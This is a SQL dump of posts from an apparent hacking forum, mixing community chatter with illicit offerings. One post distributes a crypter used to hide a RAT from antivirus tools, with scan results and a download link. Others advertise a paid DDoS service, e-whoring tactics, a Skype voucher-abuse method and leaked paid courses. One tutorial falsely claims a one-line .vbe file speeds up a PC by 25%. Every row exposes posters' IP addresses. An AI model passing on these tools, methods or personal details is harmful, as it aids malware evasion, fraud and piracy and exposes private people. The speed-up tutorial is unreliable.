INTO mybb_posts VALUES('6478', '1114', '0', '49', 'AWARDS SUGGETION', '0', '257', 'XxTREYZxX', '1351316244', 'Hey LH,\r\nI think it would be cool to have a awards page so you can see what the awards stand for :)', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'd4b226189d41032c6ffe8ebd9431c722', '0', '0'); INSERT INTO mybb_posts VALUES('6479', '1115', '0', '49', 'Update the logo....', '0', '222', 'Exposé', '1351316875', 'I just made this L33thacking halloween logo so Jok3r or NXK should update the logo :D\n\n[img]http://i.imgur.com/2drzA.png[/img]', '74.76.76.132', '1246514308', '1', '0', '222', '1351316910', '1', 'a3dba0b33a0eb3d0e376fa2c5aa5b0d8', '0', '1351316910'); INSERT INTO mybb_posts VALUES('6480', '1115', '6479', '49', 'RE: Update the logo....', '0', '295', 'Lollipop123', '1351321583', 'I really like the logo great work expose \nnice work :P', '203.104.11.7', '-882373881', '0', '0', '0', '0', '1', 'ec04211ae7e7cf9210efbc66cf0d1766', '0', '0'); INSERT INTO mybb_posts VALUES('6481', '1116', '0', '4', 'LOLLIPOP IN THE HOUSE :O', '0', '295', 'Lollipop123', '1351321647', 'Hey guys im new so yeah \r\nfrom lollipop :)', '203.104.11.7', '-882373881', '0', '0', '0', '0', '1', '9c495d277e63fc28f3172bd9a313e5a4', '0', '0'); INSERT INTO mybb_posts VALUES('6482', '1114', '6478', '49', 'RE: AWARDS SUGGETION', '0', '295', 'Lollipop123', '1351321735', 'This would be cool,even though i got none ahha', '203.104.11.6', '-882373882', '0', '0', '0', '0', '1', '5b6863f9c5d14e02b7ebdbd53c92569b', '0', '0'); INSERT INTO mybb_posts VALUES('6483', '1112', '6472', '49', 'RE: SUGGESTION', '0', '295', 'Lollipop123', '1351321849', 'True there is has been no rep fuck so yeah\neven know im new thats the first thing i checked to see if this is a nice community :P', '203.104.11.4', '-882373884', '0', '0', '0', '0', '1', 'fe8230748c17c76e637a817d23d22141', '0', '0'); INSERT INTO mybb_posts VALUES('6484', '1115', '6479', '49', 'RE: Update the logo....', '0', '222', 'Exposé', '1351322702', 'Come on...I always do my best work :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '116cfab275eccfa8d92ff7d39f17eabc', '0', '0'); INSERT INTO mybb_posts VALUES('6485', '1116', '6481', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '222', 'Exposé', '1351324912', 'Sup lollipop123 and welcome to L33thacking. Please try to be active and post HQ topics :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '7ce507fea740bc60e19e3973b2cff1d6', '0', '0'); INSERT INTO mybb_posts VALUES('6486', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '53', 'sirchamp', '1351329461', '[b]Username:[/b]Sirchamp\n[b]Age:[/b]Unknown\n[b]Is your English spelling/grammar good?: [/b]It\'s okay.\n[b]How many Experience do you have with making money online?:[/b]I have lots of experience with making money online. Cpa, Ebay, GPT, adfoc.us, adf.ly, PPD and e-whoring\n[b]What for methods do you use?:[/b]Ebay and adfoc.us\n[b]Do you succeed more than you fail, or not?:[/b]I do. At the moment I make 35 Dollars a day.\n[b]Explain Why you want to join the group:[/b]I want to learn new methods and I want to share my private methods (e.g adfoc.us)\n[b]Profile Link:[/b]http://l33thacking.net/user-53.html', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'd1913d932b15bd958db50adad1e696c7', '0', '0'); INSERT INTO mybb_posts VALUES('6487', '1115', '6479', '49', 'RE: Update the logo....', '0', '228', 'VirtualLegend', '1351334427', 'Looks good, but i doesn\'t match the green theme of LH, so Joker needs to change the green to make it match :P\nIdk if he want to do that', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '1b14c60b8f4f9b3c940fb266708c947a', '0', '0'); INSERT INTO mybb_posts VALUES('6488', '1116', '6481', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '228', 'VirtualLegend', '1351334528', 'Why Lollipop123 and not just Lollipop ?\n\nWelcome Bro, Stay active and HQ', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '639faabd9be7305eb382f382dc669aa8', '0', '0'); INSERT INTO mybb_posts VALUES('6489', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '228', 'VirtualLegend', '1351334790', 'Welcome Sirchamp to the Marketers !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '3755e8973be8bd0b03bb0df485c4b51c', '0', '0'); INSERT INTO mybb_posts VALUES('6490', '1108', '6442', '12', 'RE: How to Crash Small Websites', '0', '228', 'VirtualLegend', '1351334986', 'If you copy it from other websites do it good and with credits.\nThe pictures are broken \n\nAnd plz post some HQ threads, this is really bad\n\nSite: http://m14hackersworld.blogspot.nl/2012/09/how-to-crash-small-websites.html#', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '83da53e6b2cb58e5f22304df5e8aa514', '0', '0'); INSERT INTO mybb_posts VALUES('6491', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '53', 'sirchamp', '1351336696', 'I guess you bought time from a booter.. Its not your own booter right?\nProbobally truboot.', '188.155.56.90', '-1130678182', '1', '0', '53', '1351359387', '1', '55306c49486f2d3a3af04a89b65c0eba', '0', '1351359387'); INSERT INTO mybb_posts VALUES('6492', '1114', '6478', '49', 'RE: AWARDS SUGGETION', '0', '82', 'iTzIpod', '1351337131', 'http://l33thacking.net/misc.php?action=help&hid=12\n\n/Request Close Thread. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c74f7cb29183fb67dcdb2b7d74f3bf95', '0', '0'); INSERT INTO mybb_posts VALUES('6493', '1115', '6479', '49', 'RE: Update the logo....', '0', '257', 'XxTREYZxX', '1351342722', 'Maybe you could make it a autumn colour :P', '122.108.192.197', '2053947589', '1', '0', '0', '0', '1', '1a7f7c007324fddaf29ad9c3d70c28d1', '0', '0'); INSERT INTO mybb_posts VALUES('6494', '1115', '6479', '49', 'RE: Update the logo....', '0', '222', 'Exposé', '1351346754', 'He doesn\'t need to change anything. It will look fine lol', '66.87.9.104', '1113000296', '1', '0', '0', '0', '1', '1b3b8b29b95cf9e7649becb8e8b5d269', '0', '0'); INSERT INTO mybb_posts VALUES('6495', '1115', '6479', '49', 'RE: Update the logo....', '0', '82', 'iTzIpod', '1351352533', 'It looks fine! :) Good job.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9c6fd2c805410cff9cf24ae733584cb8', '0', '0'); INSERT INTO mybb_posts VALUES('6496', '1106', '6430', '49', 'RE: Halloween Logo?', '0', '82', 'iTzIpod', '1351352571', 'I really like it Expose! :) Good job.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f0603cac25af9b343a7fc8b86113fdd5', '0', '0'); INSERT INTO mybb_posts VALUES('6497', '1112', '6472', '49', 'RE: SUGGESTION', '0', '82', 'iTzIpod', '1351352624', 'Nice suggestion. But it would be kinda useless right now because rep fucks haven\'t occured yet. Or, not that I know of..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7cb7429d287783e3a99b437bd9969baf', '0', '0'); INSERT INTO mybb_posts VALUES('6498', '1116', '6481', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '82', 'iTzIpod', '1351352664', 'Can I suck on your lollipop? ;)\n\nWelcome to L33tHacking dude! :)\nEnjoy your stay\nRead the rules and follow them please!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3a1dd7f4dfda468a1e4b9227eef413d', '0', '0'); INSERT INTO mybb_posts VALUES('6499', '1117', '0', '82', 'Start Banking $297+ In 24hrs From Now....', '0', '228', 'VirtualLegend', '1351354461', '[align=center][img]http://socialmediadesignkit.com/sl/1.jpg[/img]\r\n\r\nSales Page:\r\n[code]http://socialmediadesignkit.com/[/code]\r\n\r\nDownload Links:\r\n[code]http://uploaded.net/file/9marswox/SMDKa.zip\r\n\r\n\r\nhttp://uploaded.net/file/ipmslf7q/SMDKb.zip\r\n\r\n\r\nhttp://uploaded.net/file/cq4lkbgu/A.zip\r\n\r\n\r\nhttp://uploaded.net/file/3tu8fppf/C.zip\r\n\r\n\r\nhttp://uploaded.net/file/5hb9y2ad/B.zip\r\n\r\n\r\nhttp://uploaded.net/file/395w4c10/Fonts.zip[/code][/align]', '83.83.167.183', '1397991351', '1', '0', '228', '1351367816', '1', 'bcb2cb9768f6bc23d1be0a06aa1a4a53', '0', '1351367816'); INSERT INTO mybb_posts VALUES('6500', '1115', '6479', '49', 'RE: Update the logo....', '0', '1', 't3h jok3r', '1351356019', 'I don\'t think the color needs to be changed because the color right now makes it look a bit spooky and it\'s going to stay there for a couple of days only so I think it\'s good.\n\nThanks Expose. Suggestion accepted, do not remove the logo.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9285989cfa09c76fadbd599168ff45c3', '0', '0'); INSERT INTO mybb_posts VALUES('6501', '1115', '6479', '49', 'RE: Update the logo....', '0', '61', 'NXK', '1351357530', 'It looks the exact same as leak forums logo? :/', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '14ba0c3815dab7d5276e11c3459b0696', '0', '0'); INSERT INTO mybb_posts VALUES('6502', '1116', '6481', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '61', 'NXK', '1351357779', 'Enjoy it here, I hope you like our community :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '47481575f02163c18592e0a7ed6ebfa8', '0', '0'); INSERT INTO mybb_posts VALUES('6503', '1118', '0', '9', '? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '53', 'sirchamp', '1351362966', '[img]http://i.imgur.com/u6W1O.jpg[/img]\nThanks to virtuallegend for making the epic threaddesign.', '246.156.113.42', '-157519574', '1', '0', '53', '1351528394', '1', 'a331621fa4af01f93579bba7b85e97fd', '0', '1351528394'); INSERT INTO mybb_posts VALUES('6593', '1135', '0', '4', 'Most Dope General in the building!', '0', '302', 'Mac Miller', '1351529743', '[align=center]Hello guys whats up. My Real name is Chester. I\'m a 16 year old male who likes forums, smoking, and just having fun. I can see ill be active on this forum hopefully i make a name for myself here. If you have questions just ask me and ill answer. Alright Peace! :)[/align]', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', '311d7df46a76e4ec7544d79bd8c6aff0', '0', '0'); INSERT INTO mybb_posts VALUES('6616', '1135', '6593', '4', 'RE: Most Dope General in the building!', '0', '1', 't3h jok3r', '1351536856', 'Welcome to L33T Hacking. Where did you find LH?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c70fc6bf1c5ce52ac4495cc07eb23c8c', '0', '0'); INSERT INTO mybb_posts VALUES('6509', '1116', '6481', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '82', 'iTzIpod', '1351370835', '@Reloadzor, Yeah ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f974d1f5a112c524013f4e011c6080e0', '0', '0'); INSERT INTO mybb_posts VALUES('6510', '1116', '6481', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '62', 'R?????zo?', '1351371440', 'okay :/\nI guess that\'s wierd :P', '94.132.244.168', '1585771688', '1', '0', '62', '1351371457', '1', 'ba21555daf6877f61d3b46563a64264d', '0', '1351371457'); INSERT INTO mybb_posts VALUES('6505', '1115', '6479', '49', 'RE: Update the logo....', '0', '82', 'iTzIpod', '1351366226', 'I looks like LeakForums\'s old Halloween Logo. They changed it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c721ba9f7544626194f47dab9efa0a30', '0', '0'); INSERT INTO mybb_posts VALUES('6506', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1351366284', 'Can I have 1 vouch copy please? :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e5b64ee6f8adadb9f29eea33c35db3ad', '0', '0'); INSERT INTO mybb_posts VALUES('6507', '1116', '6498', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '62', 'R?????zo?', '1351366684', '[quote=\'iTzIpod\' pid=\'6498\' dateline=\'1351352664\']\r\nCan I suck on your lollipop? ;)\r\n[/quote]\r\n\r\nyou sure about that? :o', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3935b983ea54acbf8fd88e4366369fa7', '0', '0'); INSERT INTO mybb_posts VALUES('6508', '1119', '0', '82', 'Simple Clickbank - Step By Step Tutorial [ The Ultimate Clickbank System ]', '0', '228', 'VirtualLegend', '1351368123', '[align=center][size=medium][img]http://www.simplecb.com/images/bundle2.jpg[/img]\r\n\r\nSales Page:\r\n[code]http://www.simplecb.com/[/code]\r\n\r\nDownload Links: \r\n[code]http://d1cezw6wwchlw4.cloudfront.net/SimpleCB/SimpleCBvideos.zip\r\nhttp://d1cezw6wwchlw4.cloudfront.net/SimpleCB/SimpleCBlayouts.zip\r\nhttp://d1cezw6wwchlw4.cloudfront.net/SimpleCB/SimpleCBSalesPage.zip[/code]\r\n\r\n[quote]Special Credits to Imreport [/quote][/size][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6d22855f839a1d4317d2a43abf21759e', '0', '0'); INSERT INTO mybb_posts VALUES('6511', '1119', '6508', '82', 'RE: Simple Clickbank - Step By Step Tutorial [ The Ultimate Clickbank System ]', '0', '62', 'R?????zo?', '1351371501', 'Looks good, I will check it out.\nThanks alot.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd262ce0127eef5cb307a5fa537625268', '0', '0'); INSERT INTO mybb_posts VALUES('6512', '1115', '6479', '49', 'RE: Update the logo....', '0', '222', 'Exposé', '1351379275', 'So we aren\'t changing it. And I don\'t care. Took me like 2 min so it\'s not a big deal. But figured we would get in the festive mood :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '7ef91ed596fd5365c2583d4a333c0111', '0', '0'); INSERT INTO mybb_posts VALUES('6513', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '257', 'XxTREYZxX', '1351379984', 'May i please have a vouch copy thanks mate', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '96545d254def0ed6df0127b38817d3df', '0', '0'); INSERT INTO mybb_posts VALUES('6514', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1351385563', 'He clearly said he will only give 1...\n+ I got it first. :P', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bde7d741b5cfa521a47a96a775e7a98c', '0', '0'); INSERT INTO mybb_posts VALUES('6515', '1116', '6481', '4', 'RE: LOLLIPOP IN THE HOUSE :O', '0', '1', 't3h jok3r', '1351387123', 'Welcome to L33T Hacking lollipop. Hope you enjoy your stay, where did you find us?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'eca946c424bbc4b7ff17f4af0a5b12b8', '0', '0'); INSERT INTO mybb_posts VALUES('6516', '1115', '6479', '49', 'RE: Update the logo....', '0', '2', 'Apathy', '1351387672', 'Not bad actually.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '00832d7e934fa8edce3151906abab1fc', '0', '0'); INSERT INTO mybb_posts VALUES('6517', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '2', 'Apathy', '1351387754', 'Sounds like a nice group. Good luck with it.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '3d729f296f3b00250978ea82bd8f01ae', '0', '0'); INSERT INTO mybb_posts VALUES('6518', '1119', '6508', '82', 'RE: Simple Clickbank - Step By Step Tutorial [ The Ultimate Clickbank System ]', '0', '2', 'Apathy', '1351387800', 'Nice I will check this out in a bit.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'ac9dfac318b2a2c66099591ee9951d6c', '0', '0'); INSERT INTO mybb_posts VALUES('6519', '1093', '6473', '7', 'RE: I\'m back', '0', '1', 't3h jok3r', '1351390420', '[quote=\'??????????¢™\' pid=\'6473\' dateline=\'1351313219\']\r\nI didnt even notice that he was banned.\r\n[/quote]\r\nMods and Staff can only see bans made on site, I can manage bans made by cloudflare.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1c8069c1f862997bfbb0c1df03e2fae8', '0', '0'); INSERT INTO mybb_posts VALUES('6520', '1099', '6401', '16', 'RE: Box Method and Drop Explained', '0', '7', 'Romdu62', '1351390508', 'No problem itz, i will try my best', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '7114d4742e19e29286bf10e98f203eec', '0', '0'); INSERT INTO mybb_posts VALUES('6521', '1100', '6402', '42', 'RE: 895 passwords not to use.', '0', '7', 'Romdu62', '1351390576', 'lOl my aunt thinks that keeping a easy password is the best thing because then if someone tries to guess then they wont think someone would keep easy password.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e12925a2c951c9838c0675d5961279b7', '0', '0'); INSERT INTO mybb_posts VALUES('6522', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '7', 'Romdu62', '1351390622', 'No problem guys enjoy and if you guys like my threads then i will do more', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '496daa46f65b925aab901a79579e49ea', '0', '0'); INSERT INTO mybb_posts VALUES('6523', '1120', '0', '19', '[Junk]HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '7', 'Romdu62', '1351390806', '[size=large][color=#006400]A fellow \'friend\' of mine made this, and he was selling it for 15 bucks.. bullshit. So I thought I could give all you muthafuckin ballers a tutorial that I leaked.[/color][/size]\n\n[hide] Requirements:\nYou are going to need about 10 emails. I know, sorry.\nAnd your going to need a non-premium skype account.\n\nStep 1:\nNow, your going to need to go to:\nhttp://www.freegroupvideocallingskype.com/\n(yes, it is actually a legit site)\n\nStep 2:\nFor email enter in a REAL email. You won\'t get spam, trust me.\nThen for skype name, enter in something fake like: leakforums or Friend.\n\nStep 3:\nDo the CAPTCHA and then check your email. You should get a code.\n\nStep 4:\nGo to: https://secure.skype.com/account/voucher/redeem\nThen type in the code.\n\nStep 5:\nLogin into your account on skype and BOOM! You have unlimited premium.\n\nNOTES:\nThis premium lasts only 7 days, so just rinse and repeat.\n\n[/hide]\n\n[color=#FF0000]PROOF: THIS METHOD IS CONFIRMED WORKING BY ME, I JUST CALLED A NUMBER AND TEXTED A NUMBER.\n\n[quote=Offence RAT]\ndamn it worked.\n[img]http://puu.sh/1jwlN[/img]\n[/quote]\n[/color]', '72.231.24.165', '1223104677', '0', '0', '7', '1351390839', '1', 'e75a82608a3cf751f41564c77428c7e0', '0', '1351390839'); INSERT INTO mybb_posts VALUES('6524', '1121', '0', '20', 'JodMod Crypter 1/35 cracked', '0', '7', 'Romdu62', '1351390969', 'HF thread - http://www.hackforums.net/showthread.php?tid=2965136\r\n\r\nArchivo: cybergate.exe\r\nTama?o: 369240 Bytes\r\nMD5: 9c8f8586253e7886672a3d0ca268a73c\r\nSHA1: 03bdf64a3f49425986d38334be1b2946a88e40b3\r\nResultado: 1/35\r\nEstado: Infectado\r\n\r\nAVG Free - OK\r\nArcaVir - OK\r\nAvast 5 - OK\r\nAntiVir (Avira) - OK\r\nBitDefender - OK\r\nVirusBuster Internet Security - OK\r\nClam Antivirus - OK\r\nCOMODO Internet Security - OK\r\nDr.Web - OK\r\neTrust-Vet - OK\r\nF-PROT Antivirus - OK\r\nF-Secure Internet Security - OK\r\nG Data - OK\r\nIKARUS Security - OK\r\nKaspersky Antivirus - OK\r\nMcAfee - OK\r\nMS Security Essentials - OK\r\nESET NOD32 - OK\r\nNorman - OK\r\nNorton Antivirus - OK\r\nPanda Security - OK\r\nA-Squared - OK\r\nQuick Heal Antivirus - OK\r\nRising Antivirus - OK\r\nSolo Antivirus - OK\r\nSophos - OK\r\nTrend Micro Internet Security - OK\r\nVBA32 Antivirus - OK\r\nVexira Antivirus - Suspicious!SA\r\nZoner AntiVirus - OK\r\nAd-Aware - OK\r\nBullGuard - OK\r\nImmunet Antivirus - OK\r\nK7 Ultimate - OK\r\nVIPRE - OK\r\n\r\nDownload:\r\nhttp://www.speedyshare.com/ZE5k8/JOD-Cryp.rar', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'ae4850481f6ed3cf4b0b97ad0570dd51', '0', '0'); INSERT INTO mybb_posts VALUES('6525', '1105', '6427', '24', 'RE: Windows 8 Officially released 26-10', '0', '7', 'Romdu62', '1351391031', 'I will not swith now i will in january when they fix all bugs.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'ee4153a1cc7aba3dfc00e12cbe9b649f', '0', '0'); INSERT INTO mybb_posts VALUES('6526', '1122', '0', '25', '[TuT]How To Speed Up Your Computer', '0', '7', 'Romdu62', '1351391118', '[color=#0000CD][size=medium][font=Times New Roman][i][b][align=center][TuT]How To Speed Up Your Computer[/align][/b][/i][/font][/size][/color]\r\n\r\nWell now you don\'t have to download any software or any other application to make your computer any faster , you are going to create your own application or its fine to say a script which will Speed up your computer by [b]25%[/b] and yes, you can feel the result instantly on you pc. So just follow out this easy steps.\r\n\r\n[color=#FF0000][b]First open you notepad and just copy/paste the code below on your notepad:[/b][/color]\r\n\r\n[code]mystring=(80000000) for 128 MB? RAM\r\nmystring=(160000000) for 256 MB? RAM\r\nmystring=(320000000) for 512 MB? RAM\r\nmystring=(655000000) for 1GB RAM\r\nmystring=(1000000000) for 2GB RAM & Above.[/code]\r\n\r\nOnly choose 1 line.\r\n[b]For example:[/b]\r\n\r\nIf I have 2Gb+\r\n[b]I put in Notepad:[/b]\r\n[code]mystring=(1000000000)[/code]\r\n\r\nNow save this notepad and type in this as the name \" [b]ram.vbe[/b] \" ( without quote.)\r\n\r\nNow click on \" [b]ram.vbe[/b] \" and you are done, you can realize the Boost Instantly.\r\n\r\nThis trick is personally checked by me and found [b]25%[/b] Increase In my PC Speed.\r\n\r\nIf you don\'t believe me than just use any Pc performance checker and test it.\r\n\r\n[b]NOTE:[/b] \r\n[color=#0000CD][b]You have to do this only once![/b][/color]\r\n[color=#696969][b]You won\'t see anything pop up so you may think it didn\'t run, but it did.[/b][/color]\r\n\r\n[b]Credits:[/b] [size=x-small]Deltaforce[/size]\r\n\r\nEnjoy!;)', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'dd94feafa03ee5ac902b090678da98d6', '0', '0'); INSERT INTO mybb_posts VALUES('6527', '1123', '0', '44', 'eWhoring Tactics; How to Change Writing on Pics', '0', '5', 'Timmy', '1351391351', '[align=center][img]http://i.imgur.com/TtoJU.png[/img][/align]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7cd70bbbef33eaabd7479a0ae6a6abd5', '0', '0'); INSERT INTO mybb_posts VALUES('6528', '834', '4377', '64', 'RE: The Marine DVDrip', '0', '9', 'p420', '1351391417', 'Thanks going to watch this now and might update my rating on the movie.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'ed7b8dfd8fda141cca507ea841b3f24e', '0', '0'); INSERT INTO mybb_posts VALUES('6529', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '8', 'spacefish36', '1351392280', '10/10 because he is the celebrity of LH', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '4933efe78216fd60aa374c590a706aa8', '0', '0'); INSERT INTO mybb_posts VALUES('6530', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '82', 'iTzIpod', '1351394655', 'Legit. Actually works! :) Thanks for the method.\nVOUCH.\n\n:)\n\nIt\'s not really a Skype premium though..\nIt only allows you to call a group with a certain amount of people or whatever.\n\n[img]http://i.imgur.com/nsolw.png[/img]', '24.212.197.164', '416597412', '1', '0', '82', '1351395661', '1', '8ffbf7cab8cc09396032b74220d3262e', '0', '1351395661'); INSERT INTO mybb_posts VALUES('6531', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351394709', 'Lol thanks Spacefish. But no I\'m not the celebrity of LH. \n10/10. Sexiest avatar known to mankind. \n\nYou got no avatar at all <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5adf433020f2d909d8ec2372a2b6f43b', '0', '0'); INSERT INTO mybb_posts VALUES('6532', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '53', 'sirchamp', '1351415127', 'Delivered 3k Vouch views to itzipod. You have now 9.3 Dollars on your account.\r\n\r\nProof\r\n[img]http://i.imgur.com/RTbOv.jpg[/img]', '9.206.60.253', '164510973', '1', '0', '53', '1351415143', '1', '848b530b4b9b95d91fe6a264265f7140', '0', '1351415143'); INSERT INTO mybb_posts VALUES('6533', '1099', '6401', '16', 'RE: Box Method and Drop Explained', '0', '150', 'MinecraftGeek', '1351421350', 'I guess this could work but it\'s risky.', '86.161.32.155', '1453400219', '0', '0', '0', '0', '1', '2f74831e2f0adb0a2c6f15187f066cf4', '0', '0'); INSERT INTO mybb_posts VALUES('6534', '1123', '6527', '44', 'RE: eWhoring Tactics; How to Change Writing on Pics', '0', '228', 'VirtualLegend', '1351422260', 'Nice Thread, This will help alot', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ada0c29a4b39f3c73e02ce510ba1c4b1', '0', '0'); INSERT INTO mybb_posts VALUES('6535', '1115', '6479', '49', 'RE: Update the logo....', '0', '205', 'mothered', '1351425669', 'Although It doesn\'t match the theme, I must say that I like It.\r\n\r\nIt breaks up the green, and looks quite appealing.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a1c75f647351819755cce2e5a236cd48', '0', '0'); INSERT INTO mybb_posts VALUES('6536', '1123', '6527', '44', 'RE: eWhoring Tactics; How to Change Writing on Pics', '0', '62', 'R?????zo?', '1351430954', 'Looks good, even though I already knew how to do this before :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1f961f601a6e106b213f96ccfaabfa46', '0', '0'); INSERT INTO mybb_posts VALUES('6537', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '100', '??zg???g????61', '1351434688', 'Nope, a friend gave me the sources for hDos and bDos. I don\'t use a paid booter xD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '48bcdec5c85c246f789f6ef93f7799aa', '0', '0'); INSERT INTO mybb_posts VALUES('6538', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1351435065', 'VOUCH. :)\n[img]http://i.imgur.com/y7OK1.png[/img]\n\nThanks sirchamp.\nWill you ever consider releasing the program to the public or whatever you\'re using?', '24.212.197.164', '416597412', '1', '0', '82', '1351435452', '1', '5a14f25459ade0edcf5d7d9e0b0ebea9', '0', '1351435452'); INSERT INTO mybb_posts VALUES('6539', '1115', '6535', '49', 'RE: Update the logo....', '0', '61', 'NXK', '1351435569', '[quote=\'mothered\' pid=\'6535\' dateline=\'1351425669\']\r\nAlthough It doesn\'t match the theme, I must say that I like It.\r\n\r\nIt breaks up the green, and looks quite appealing.\r\n[/quote]\r\n\r\nIt does look very good. I must say good job expose for this :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'a07895991460eca466c4ff6c4e864647', '0', '0'); INSERT INTO mybb_posts VALUES('6540', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '62', 'R?????zo?', '1351439475', '10/10 because I loved pokemon :P', '94.132.244.168', '1585771688', '1', '0', '62', '1351439782', '1', '5ea78a34f5b473b34632043830b88783', '0', '1351439782'); INSERT INTO mybb_posts VALUES('6541', '1124', '0', '42', '22-Year-Old Girl Sells Her Virginity Online', '0', '264', 'D?ea', '1351440150', '[IMG]http://www.foxnews.com/images/492948/0_61_011509_nataliedylan.jpg[/IMG]\r\n\r\nA 22-year-old woman is selling her virginity online — offering her body to bidders nationwide in an auction that reportedly has netted a $3.7 million offer — and the law isn\'t doing a thing to stop her.\r\n\r\nThe FBI isn\'t interested. The U.S. attorney doesn\'t care. Everything is fine by local police, and she isn\'t breaking any laws.\r\n\r\nThat\'s because Natalie Dylan, a made-up name for a real 22-year-old California college grad, is marketing her maidenhead in Nevada, where prostitution is legal.\r\n\r\nBut some religious legal groups are objecting to the sexual sale, saying they are concerned that its influence may reach beyond the borders of the \"Battle Born\" bordello state.\r\n\r\n\"It does seem crazy,\" said Mathew Staver, director of the Liberty Center for Law and Policy. \"The rest of the country has an interest in stopping that kind of activity from spreading from Nevada to their home state.\"\r\n\r\nStaver said because the bidding was being conducted online, federal law could be applied to stop the auction from going through.\r\n\r\n\"Nevada has been out of step with the rest of the country for many years with regards to prostitution, and that\'s why I think it\'s important for federal prosecutors to look into this, so that Nevada does not dictate the morals and moral decency for the rest of the nation,\" Staver told FOXNews.com.\r\n\r\nBut federal authorities said there wasn\'t much they could do about the case, and deflected attention toward local statutes.\r\n\r\n\"Being that prostitution is legal in the area that she\'s listing from, and she\'s over 18 and it\'s consensual, I would defer it to local police authorities,\" said David Staretz, a spokesman for the FBI\'s Las Vegas field office.\r\n\r\nThe Postal Inspection Service, which monitors the Internet for some illegal transactions, is \"currently unaware of any specific fed prohibition against this activity,\" said spokesman Al Weissman.\r\n\r\nThe office of the U.S. attorney in Nevada said that it has prosecuted over 200 cases in the last six years involving the solicitation of minors online, but it had never worked on a case like this involving adults.\r\n\r\nThe Moonlite Bunny Ranch, the brothel that is arranging and hosting the deal, sounded especially gung-ho about Dylan.\r\n\r\n\"Natalie is a virgin and would like to sell this priceless and rare commodity in a very exclusive and private setting,\" says the Bunny Ranch Web site.\r\n\r\nWhile the commodity\'s rarity may be debatable, more than 10,000 bidders have come forth to put a price tag on Dylan\'s purity. And if the Bunny Ranch\'s owner is to be believed, someone has offered $3.7 million, a price far above 